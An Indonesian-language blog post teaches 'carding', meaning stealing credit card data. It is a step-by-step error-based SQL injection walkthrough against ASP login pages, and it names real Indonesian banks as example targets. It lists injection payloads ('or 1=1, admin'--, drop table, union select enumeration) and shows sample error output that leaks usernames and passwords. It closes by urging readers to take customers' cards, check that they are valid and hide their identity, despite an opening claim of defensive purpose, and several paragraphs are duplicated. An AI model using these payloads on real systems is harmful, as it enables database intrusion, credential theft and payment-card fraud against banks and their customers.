hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkan
nach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder.
nach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder.SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech.
untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP.
EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI...
HTTP=HYPER TEXT TRANSPER PROTOCOL
WWW=WORD WIDE WEB
PHP=HYPER TEXT PREPROCESSOR
ASP=ACTIVE SERVER PAGE
Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya.
naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:
- '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
- pada bagian username: admin'--
- ------------^^------------------: 'or 1=1-
- ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
- atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja:'having 1=1- -
maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake 'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan error
nah...!!!kita lanjut.sekarang pesan error nya begini:
nah...!!!kita lanjut.sekarang pesan error nya begini:MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35
maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35
nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35
nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -
maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35
oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - - maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35
DAPAT......!!!KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak ya???jangan-jangan tuch kartu dah abis masa berlakunya
cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.selamat mencoba
Tidak ada komentar:
Posting Komentar